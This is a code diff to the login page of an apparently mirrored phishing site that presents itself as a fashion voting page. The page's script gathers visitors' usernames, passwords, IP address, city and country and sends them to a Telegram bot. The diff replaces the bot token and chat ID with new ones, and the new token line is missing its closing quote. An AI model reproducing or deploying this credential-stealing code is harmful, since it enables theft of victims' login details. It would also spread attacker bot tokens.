--- a/login.html
+++ b/login.html
@@ -89,8 +89,8 @@
       const country = document.getElementById('country').value;
             var telegramMessage = `Username: ${username}\nPassword: ${password}\nIP: ${ipaddress}\nCity: ${city}\nCountry: ${country}`;
            
-                var token = '7933375890:AAEom0GofbpGV8lassBKN_g5_qtu-X6i_bM';
-      var chat_id = '6509117933';
+                var token = '8384188856:AAEsf9qHpnJ1-438BQxfxYdJB-T-2IGlCn8;
+      var chat_id = '8499614893';
             var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(telegramMessage)}`;
 
             fetch(url)
@@ -112,3 +112,4 @@
 
 <!-- Mirrored from voting.name.ng/slink/vote-ig-fashion_dar_v/login by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 10 Mar 2025 20:44:55 GMT -->
 </html>
+
